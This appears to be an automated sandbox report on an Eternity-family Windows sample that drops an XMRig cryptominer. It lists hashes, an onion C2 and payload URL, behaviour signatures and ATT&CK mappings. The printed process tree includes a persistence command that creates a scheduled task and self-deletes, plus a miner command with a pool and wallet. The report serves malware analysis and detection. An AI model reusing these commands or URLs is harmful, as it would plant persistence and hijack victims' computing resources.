Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-11-2022 13:46

General

  • Target

    5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe

  • Size

    14KB

  • MD5

    f0b3cfdcf9b45fad9316a91ad770e3e1

  • SHA1

    a2e9b01faee6a37ef3a51bbb02f6c5bac4c473a2

  • SHA256

    5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9

  • SHA512

    6965d6a85c89a38af082674891e0945b1cffd9cd3b6b402fdcbd93a8e027936f98db37d093dc3694b2c73167e3d54cd79ccc37caea90f4ca1bb664857006811a

  • SSDEEP

    384:wIpm2b9AbbFgUKBdqy32ZM+dfOEambfsyy0wrm9EvLtk5tx+C:732O+fOMb6pcEvLWZ

Score
10/10

Malware Config

Extracted

Family

eternity

C2

http://rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion

Attributes
  • payload_urls

    http://rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion.pet/shared/xmrig.exe

Signatures

  • Eternity

    Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe
    "C:\Users\Admin\AppData\Local\Temp\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2324
      • C:\Windows\SysWOW64\chcp.com
        chcp 65001
        3⤵
          PID:1952
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:4404
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:4736
        • C:\Users\Admin\AppData\Local\ServiceHub\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe
          "C:\Users\Admin\AppData\Local\ServiceHub\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe"
          3⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3152
          • C:\Users\Admin\AppData\Local\Temp\Admin_IYMUGYHL.exe
            "C:\Users\Admin\AppData\Local\Temp\Admin_IYMUGYHL.exe" -a cryptonight -o pool.supportxmr.com:3333 -u 88NyA9Dn745S6fsrwYdBYQFv75rNNYqjuGJXnZdzKaYk6WXLXejbUY35LJEc7TQ3YGhqbaKtEWBjp6B7eKZGVEmPT8488w2.Admin_IYMUGYHL -p x --max-cpu-usage=60 --donate-level=1
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:3692
    • C:\Users\Admin\AppData\Local\ServiceHub\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe
      C:\Users\Admin\AppData\Local\ServiceHub\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe
      1⤵
      • Executes dropped EXE
      PID:1584
    • C:\Users\Admin\AppData\Local\ServiceHub\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe
      C:\Users\Admin\AppData\Local\ServiceHub\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe
      1⤵
      • Executes dropped EXE
      PID:1604

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Remote System Discovery

    1
    T1018

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe.log
      Filesize

      321B

      MD5

      baf5d1398fdb79e947b60fe51e45397f

      SHA1

      49e7b8389f47b93509d621b8030b75e96bb577af

      SHA256

      10c8c7b5fa58f8c6b69f44e92a4e2af111b59fcf4f21a07e04b19e14876ccdf8

      SHA512

      b2c9ef5581d5eae7c17ae260fe9f52344ed737fa851cb44d1cea58a32359d0ac5d0ca3099c970209bd30a0d4af6e504101f21b7054cf5eca91c0831cf12fb413

    • C:\Users\Admin\AppData\Local\ServiceHub\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe
      Filesize

      14KB

      MD5

      f0b3cfdcf9b45fad9316a91ad770e3e1

      SHA1

      a2e9b01faee6a37ef3a51bbb02f6c5bac4c473a2

      SHA256

      5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9

      SHA512

      6965d6a85c89a38af082674891e0945b1cffd9cd3b6b402fdcbd93a8e027936f98db37d093dc3694b2c73167e3d54cd79ccc37caea90f4ca1bb664857006811a

    • C:\Users\Admin\AppData\Local\ServiceHub\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe
      Filesize

      14KB

      MD5

      f0b3cfdcf9b45fad9316a91ad770e3e1

      SHA1

      a2e9b01faee6a37ef3a51bbb02f6c5bac4c473a2

      SHA256

      5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9

      SHA512

      6965d6a85c89a38af082674891e0945b1cffd9cd3b6b402fdcbd93a8e027936f98db37d093dc3694b2c73167e3d54cd79ccc37caea90f4ca1bb664857006811a

    • C:\Users\Admin\AppData\Local\ServiceHub\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe
      Filesize

      14KB

      MD5

      f0b3cfdcf9b45fad9316a91ad770e3e1

      SHA1

      a2e9b01faee6a37ef3a51bbb02f6c5bac4c473a2

      SHA256

      5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9

      SHA512

      6965d6a85c89a38af082674891e0945b1cffd9cd3b6b402fdcbd93a8e027936f98db37d093dc3694b2c73167e3d54cd79ccc37caea90f4ca1bb664857006811a

    • C:\Users\Admin\AppData\Local\ServiceHub\5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9.exe
      Filesize

      14KB

      MD5

      f0b3cfdcf9b45fad9316a91ad770e3e1

      SHA1

      a2e9b01faee6a37ef3a51bbb02f6c5bac4c473a2

      SHA256

      5f593ccd7571dd76fa782e24e2466b4c0a46a3d537c4092080d8c4722e89b5e9

      SHA512

      6965d6a85c89a38af082674891e0945b1cffd9cd3b6b402fdcbd93a8e027936f98db37d093dc3694b2c73167e3d54cd79ccc37caea90f4ca1bb664857006811a

    • C:\Users\Admin\AppData\Local\Temp\Admin_IYMUGYHL.exe
      Filesize

      4.7MB

      MD5

      84cbc72865b542c646bd89bb9430e7d1

      SHA1

      c8320b1e24f22b36c1a283506dacdcbcf5598a4f

      SHA256

      323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4

      SHA512

      235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8

    • C:\Users\Admin\AppData\Local\Temp\Admin_IYMUGYHL.exe
      Filesize

      4.7MB

      MD5

      84cbc72865b542c646bd89bb9430e7d1

      SHA1

      c8320b1e24f22b36c1a283506dacdcbcf5598a4f

      SHA256

      323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4

      SHA512

      235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8

    • memory/1952-135-0x0000000000000000-mapping.dmp
    • memory/2324-134-0x0000000000000000-mapping.dmp
    • memory/2680-132-0x00000000006E0000-0x00000000006EA000-memory.dmp
      Filesize

      40KB

    • memory/2680-133-0x0000000005560000-0x0000000005B04000-memory.dmp
      Filesize

      5.6MB

    • memory/3152-138-0x0000000000000000-mapping.dmp
    • memory/3152-142-0x0000000004890000-0x00000000048F6000-memory.dmp
      Filesize

      408KB

    • memory/3692-147-0x000001BC3A960000-0x000001BC3A9A0000-memory.dmp
      Filesize

      256KB

    • memory/3692-146-0x000001BC3A920000-0x000001BC3A940000-memory.dmp
      Filesize

      128KB

    • memory/3692-143-0x0000000000000000-mapping.dmp
    • memory/3692-149-0x000001BC3A9A0000-0x000001BC3A9C0000-memory.dmp
      Filesize

      128KB

    • memory/3692-150-0x000001BC3A9A0000-0x000001BC3A9C0000-memory.dmp
      Filesize

      128KB

    • memory/4404-136-0x0000000000000000-mapping.dmp
    • memory/4736-137-0x0000000000000000-mapping.dmp